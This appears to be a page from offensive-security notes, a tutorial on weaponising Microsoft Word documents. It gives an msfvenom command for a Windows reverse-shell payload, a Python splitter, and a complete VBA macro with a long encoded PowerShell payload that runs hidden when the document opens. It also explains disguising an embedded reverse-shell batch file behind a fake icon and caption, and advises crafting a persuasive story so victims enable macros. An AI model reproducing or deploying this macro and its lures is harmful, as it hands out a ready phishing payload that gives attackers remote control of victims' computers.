Exploits through Microsoft Word is one of the common methods to either command or control a user's system. Word is a powerful application capable of invoking powershell commands through Macros or even executing batch files.
Macros
MSFvenom can be used for constructing the payload for a reverse shell to be included within a macro,
Copy msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.1 LPORT=443 -f hta-psh -e base64 The output has to be split into lines of 50 characters to be able to use it with macro. Instead of doing it manually, the following python code can be used for splitting the lines.
Copy str = "powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQ....."
n = 50
for i in range(0, len(str), n):
print "Str = Str + " + '"' + str[i:i+n] + '"' The output of it can be included into a macro as follows,
Copy Sub AutoOpen()
MyMacro
End Sub
Sub Document_Open()
MyMacro
End Sub
Sub MyMacro()
Dim Str As String
Str = "powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4Ad"
Str = Str + "ABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewA"
Str = Str + "kAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnA"
Str = Str + "H0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGk"
Str = Str + "AcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8Ad"
Str = Str + "wBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcAB"
Str = Str + "vAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9A"
Str = Str + "E4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQ"
Str = Str + "AaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAU"
Str = Str + "wB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQB"
Str = Str + "tAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9A"
Str = Str + "CcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACA"
Str = Str + "AJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAc"
Str = Str + "gBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB"
Str = Str + "5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkA"
Str = Str + "GUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGU"
Str = Str + "AbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAe"
Str = Str + "gBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQB"
Str = Str + "jAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5A"
Str = Str + "FMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4"
Str = Str + "AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAd"
Str = Str + "AByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEASQBkAG4ATwB"
Str = Str + "tAE0AQwBBADcAMQAnACcAKwAnACcAVwArADIALwBpAE8AQgBEA"
Str = Str + "CsAZgBhAFgAOQBIADYASQBWAFUAaABLAEoAOABpAHEANwBmAFU"
Str = Str + "AZwB7ADEAfQBYAGMASQB6AGwATABSAEEAUwBpAGkAdwBhAEcAV"
Str = Str + "QBTAEoAeABoAE0AegBDAFoATwBlAGUAegB0AC8AMwA2AFQAVgA"
Str = Str + "yAGwAVgBlAHQAYwA3AGEAJwAnACsAJwAnAGMAOABTAEkAewAxA"
Str = Str + "H0AWgBuAHgAdQBOAHYAdgBwAG0AeABFADMAbwBXAEoAJwAnACs"
Str = Str + "AJwAnADgAdwBUAHcAcwA3ADQAZQAwAFgANAArAGYARwBEAGsAS"
Str = Str + "QA0AGUAOAB0AEYAYQBrAEgASgBiAHgAdQA1AEoAWABzAGkAeAB"
Str = Str + "4AGwASQArADcAdQBhADgAaAA0AGIAdwBWAFoAQwBtAHkAbQBaA"
Str = Str + "FQAWgAyAHQARQB2AE4AbgAxAGQAUwAzADAAZgBlAHoAeABaAEY"
Str = Str + "ANQBvAFkAYQA0AEUAQQBWADcAUABLAGMARwBCAEoAQQB0AC8AQ"
Str = Str + "wBxAE0ARgA5AHYASABaADMAWAB5AEoATABTADcAOABGAEgATAB"
Str = Str + "mAEMAeQAzAEsANQBvAGkAbQBZAHYAcwBhAHMAaABaAFkATwBGA"
Str = Str + "E0AOABPADkAewAxAH0AewAxAH0ATQBnAHQARgB7ADEAfQBoAFc"
Str = Str + "ATQBEAFMAVgBjAEUAewAxAH0AOQA5AEUAKwBYAHAAVwBYAGwAV"
Str = Str + "wBhAFAAdwBJAEUAUQAwAGsAMABkAGcASABIAEsAOABMAE4AcQB"
Str = Str + "XAGkATABQAHkAUwBvAHcAUAB2ADkAeABzAHMAaQBUAHEAeABmA"
Str = Str + "EIAWQB3AGgAeABkAEcAeABEAHUAdgBGAEkAWgBlAGcAQgB4ADg"
Str = Str + "AQwA5AFkAZQBzAFkANwA1AGcAdABtAEIAQwBIAGMANQAzAHMAY"
Str = Str + "gBIAFAAUABTADkAKwBGAEsAUgBsAFUAUgBHAEUAdQBHAHoANQB"
Str = Str + "6AE4ATABzAFcAMABmAEIANABHAFkARgA2AGEAUgAvAGUAbABzA"
Str = Str + "DkAbwBjADAAVABRADgAZgBoAEIANABuAGEAMQB6AFEAUABJADU"
Str = Str + "AOQB0AGoARwB3AC8AMABnAHMASABCAFQAYQB5AEwATQBwAEgAb"
Str = Str + "QBCAG4AQgBsAG8ARwA5ADQAbgBuAHoAbQBRAFoAeABCADcAWgA"
Str = Str + "nACcAKwAnACcAQwBrAHMANQBMADYAUQAwAEwALwB3AGIATQA5A"
Str = Str + "EkAdAAzAG0AYgBRAHYAVgBkAEoAZQBxADQARQBVAGoAMwB1AHk"
Str = Str + "AMwBrAEkANgBlAHQAewAxAH0ANgBzAHcATwBLAFUANABVAHgAU"
Str = Str + "gBOACsASgBpAHkAUQBZAGEAUgBNAEEAUABoACsAUgBRAGcANgB"
Str = Str + "HAFgALwBtAHQAOQA0AEoAOQBoAHcAWABzAGoARwBOAGQAegBCA"
Str = Str + "DQATABQAFYAWQBRAEcATABkAHsAMQB9ADAASQBwAEwAKwBoAHc"
Str = Str + "ATwBPAEwATQAzADgATQAwAGQAKwArAEgAVwBKADQAOQA0AFMAM"
Str = Str + "wBrADcARgA1AHsAMQB9AGwAMwArAHYAdABYAEsAbQBDAG8AcQA"
Str = Str + "4AGQAbQBuAEQAMAB0AFIAawB4AEoANABkAEQAYgB3AEkAZgAyA"
Str = Str + "DcAYgBqAEUAVABlAHAAbgBJAGQATwA4AFQARAA5AGIAMgBIADE"
Str = Str + "AcwBUAEsAMgBDAHEAZABDAGcAbAAyAEsASQA0AEIASwBXAFIAa"
Str = Str + "QB0ACsAQwBmAEoASwBZAGIAMgBLADUAagBpAGwAMwBFAEkANQB"
Str = Str + "RAGoAWgB7ADEAfQB4AFMAYQA2AHcASgBmADkASgBWAFEAMABKA"
Str = Str + "HQANwAnACcAKwAnACcAQwBzAFcAaABEAFUAQQB7ADEAfQB5AEQ"
Str = Str + "AaQA4AGsAdABuAGsAcwBCAEoAbwB1AGIAcABlAEEAMwBnAEoAW"
Str = Str + "ABPAGcAYQBzADYAQgBIAE0ARwBaAGQASgBvAFgAKwArAHoAMAB"
Str = Str + "hAEEANQBDAFkAbwAyAGkASQBNAGcATAB2AFIAQwBTADEATQBvA"
Str = Str + "EwAQgBrAFkAVQAnACcAKwAnACcAMgAzAGwAQgA4AFEASwBTAGI"
Str = Str + "AJwAnACsAJwAnAGkAawBoAFoALwBHAG4AZQBIAFIAWABEAHkAa"
Str = Str + "wBuAEYAZwBwADQAWgBtADQAbQB2AHcAQQB6AFAAYgBUAEcAdgB"
Str = Str + "JAEQANwBvAFEAVgBCAEIAUQBEAHUAagBRADIAMgBDAEsASQBSA"
Str = Str + "EgAbgBtAGgAVABXAHkAcwA3AGcAMwBpAFoAbwBlAEwASgA5AEc"
Str = Str + "AbwBJAFUAbwBoAGQAYwBEAFMASQAwAFEARABWAGkASQBVAEQAQ"
Str = Str + "gA1AFIAeABRAGMALwBZADEAewAxAH0ASQBCAFEATgB6AGIAYgA"
Str = Str + "yAGgAZQBBADAAeQBjAGMAbABvAFUAdQBSAEMAZwBVAGcAVABKA"
Str = Str + "E8AWQBXAGMAewAxAH0ARQB0AG4AbgBRAHoAUwA0AE8ARQA4AHg"
Str = Str + "ARQBxAEcAUgB6AFAAbgBJAFIAUQBHADUAVAB4AHYARwBBAFMAb"
Str = Str + "gAwAFAANQBpAFIAQwBPAHEAUABXAGYAZgBIAGgAZABlAE0AQwB"
Str = Str + "aAG0AbwAvAFQAdwBFAGgAWgBjAGsAMwBWAFAAWQAvAG8AbgB3A"
Str = Str + "HYAMABpAEoAOABwAFAARABFAFkAUABnAGMAZwBtAGoANQBiAHE"
Str = Str + "AeQBqAEEAWAA2AHAASgBoAFoARQArAEYAZQA5AEkAVABZAEUAe"
Str = Str + "AAxAGoAeQBxAFcAKwBxAEsAbABKAFUAdABLAFcAcwA2AC8ASQB"
Str = Str + "iACcAJwArACcAJwBrAFgARwBQADEAQwAvAHUAbQBzADIAdwBYA"
Str = Str + "C8AZgBwACcAJwArACcAJwB1ADQAUwBoAGEAbwBPAG4AdABYAHs"
Str = Str + "AMQB9ADMAZgBiAGwAYwBmAE8ANABaAFoANQBVAFoARAA0AHoAY"
Str = Str + "wA5AGoAZQB1AE4AaAAnACcAKwAnACcAKwBYAFMAVQBOAHEARAA"
Str = Str + "0AFoAaABQAE4ASwBWADkAVAAwAHEAewAxAH0AYwBmAFcAdwA2A"
Str = Str + "FoAQwBEADAAVgBYAHMAOABhADcANAAnACcAKwAnACcANQBhAEE"
Str = Str + "AZQB0AGkAVgAxAGQAMQBpADYAdABqAE8AdQBPADQANQA3ADQAU"
Str = Str + "gBpAEQAOAB1AGMAbQA2AFkANQBxAGYAYgBWAFUAUQBkADEANgB"
Str = Str + "JACsAeQBPADEASwAxAGEAcQBnAFkATgBzAG0AMwAzAHkAYgBDA"
Str = Str + "C8ANgBqAFQANQBmAEcAeABTAE4ASABTAEsANwBrAFAANQBDAHA"
Str = Str + "ARgBkADEAMQArAGEAWgBhAFkAZgBOAEUAVgBwAEwAYwA2AHQAU"
Str = Str + "QA4AGMAeABXAHcAdgBkACcAJwArACcAJwAzAG8ALwBiAHgAYQB"
Str = Str + "0AFIAZABhAFUAMABGAEsAWABtAE4AYwB5AG0AeQBtADcARwBxA"
Str = Str + "HEALwAwAGkAdQBhAHcAcQBmAGEASABEAGIAWABmAGgANwBVAHY"
Str = Str + "AYgB0AEcAcAB3AGgAcQB0ACcAJwArACcAJwBzAEMAYgBTAGEAO"
Str = Str + "AB5ACsAMgBEAEgARgBWAGQAUwB3ADYAcQAzAFIAUQBoADIAWgB"
Str = Str + "GAFQATABaAFAAQQB3AFcAWQBLAHMASgBMAHUAagBGAFUAbABXA"
Str = Str + "HoAOABZADUAZABkAGsAZgBFAGYAQwB5AGEAcQBIAFgATABKADA"
Str = Str + "AcQB0AFUAeQAzAGIARAArAGEAaABYAFUARwBMAHoAcwBRAE0Ad"
Str = Str + "QAxAGUAVAB3AEcANQAwADYAbAB0AFYARwBaAGMAYgBIAGIAWAB"
Str = Str + "lAFUAaABxAEQANABiAEEANQBHAFoAbQB7ADEAfQB5AGUAaQBlA"
Str = Str + "FQAawBiAEQAOABvAFIAaABhADEAdABjAGcAQQAyAEMAMQBUAHQ"
Str = Str + "AegBOAFMALwBxAEwAVgBkAGIANwBNAG8AdQBuAEgAVQBSADIAM"
Str = Str + "QArAFQATgBaADEAWAA3AE8ATABWADgARgBMADEAdABqAGQAdQA"
Str = Str + "3ADkARwAxACsAJwAnACsAJwAnADYATwBMAHcAZQA1ADIAUAA2A"
Str = Str + "DgAdwBaAFYAZwBzAG0AcAA4AGcAMQBOAE0AaAA4AGYAaAA1AFo"
Str = Str + "AWgBZADcAVgBPAGIASwBNAGkAcQBHAEgAegAvAGsAeQBLAFgAe"
Str = Str + "ABYAFgAawBXADkATABkAHEAdgBZADcAOABZAEkARQBvAGsAQQB"
Str = Str + "HAHEAZQBKAGEATwBUAGUAWQAzADAANwB7ADEAfQBjAFkAeQBUA"
Str = Str + "FMAawBLAFMAawB2ADYAKwB3ACcAJwArACcAJwA3ADIARQBLAEw"
Str = Str + "AJwAnACsAJwAnAFIARwBhAFoAawBaAGwAaABWAEoAbQBSAFgAM"
Str = Str + "ABoAEsAdQBIAFEAawBwAEoARwBFAGYAVwB0AG8AUgBZADcAZAB"
Str = Str + "1AHAATABGAHAANABFADUAVwBPAC8AeQBKAGEAdQB7ADEAfQB5A"
Str = Str + "GYAZwBKAGUAUgBHAG8AQgBlADYAMgBIAFAANQBJAGwALwBhAG4"
Str = Str + "AWgBkAEsAVQBPAFoATAB1ADEASQAxAFQAbwBIADMAMwA2AHoAR"
Str = Str + "wBOAG4AcwBKAFQATwBXAGoATgBwAEUAZwBrADUAaQBtAHMAVwB"
Str = Str + "tAHcAUgBoAHgAQgBrAHYANABIAHEATwBBADEAdwBLAEUAeQB2A"
Str = Str + "FEAbgBXAFcANwBqAEIAMgBTAHUAbwBKAEYARABZAGsAdgB5AE8"
Str = Str + "AMABGAE0AWgBvADgAKwB4AHkAeQAnACcAKwAnACcANwAyAFIAS"
Str = Str + "QAnACcAKwAnACcAYwBqAGQAZwBCAGEARwBhADQAKwBqAGQANAB"
Str = Str + "CAEMAVQB2AEEAdwBoAG4AKwBBAFMAVQBvADYAcABQAFAAKwAyA"
Str = Str + "DUAdQAyAFIAdgBWAHkARwA4AG0AVABsAHEAcQBGAHYAQgAnACc"
Str = Str + "AKwAnACcAbgAvAHcATgB4AGoAbQB0AC8AcwAvAHMAdQBNAHAAW"
Str = Str + "AB5AEsAVQBLAHYAMQBsADgAdQBQAEsAdgB4AHYAeABPAEQARQB"
Str = Str + "TAEkAYwBSAEEAMABvAHUAeABRAG4AagA0AEMAVABVAEsAVABwA"
Str = Str + "DgAaQB6AE8AYwBZAFEAZwBIADUAeAAwAFIAQwAvAGoAdQA1AEM"
Str = Str + "AZgAzAGMASgBiAEsAeQA3ADgAZgB3AEcARwBIAEsATABIAGwAQ"
Str = Str + "QBzAEEAQQBBAHsAMAB9AHsAMAB9ACcAJwApAC0AZgAnACcAPQA"
Str = Str + "nACcALAAnACcAcgAnACcAKQApACkAKQAsAFsAUwB5AHMAdABlA"
Str = Str + "G0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8"
Str = Str + "AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAY"
Str = Str + "wBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQB"
Str = Str + "uAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsA"
Str = Str + "EUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFI"
Str = Str + "AZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAc"
Str = Str + "AB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwB"
Str = Str + "TAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDA"
Str = Str + "HIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGU"
Str = Str + "AOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8Ac"
Str = Str + "wB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQB"
Str = Str + "yAHQAKAAkAHMAKQA7AA=="
CreateObject("Wscript.Shell").Run Str
End Sub The base64 encoded output is split into lines of 50 since macros cannot accomodate more than 256 characters in a variable.
AutoOpen() and Document_Open() are procedures that call our function when the document is opened or an already opened document is reopened, respectively.
Batch Files
Batch files can be created and embedded within a word document to run when the document is opened. A base64 encoded reverse shell command can be generated using MSFVenom and included within a batch file.
Then the batch file can be included as an "object" within the work document. The neat thing about objects are, word allows you to choose your own caption and icon to masquerade the malicious content as something important.
In both these cases it is important to remember that it takes convincing to get the user to either enable macros or run an batch file since Windows always prompts the user with a warning before enabling or running the files. Hence, the content/story that encourages the user to open and run the file has to be tailored to be extremely convicing.
Last updated 7 months ago
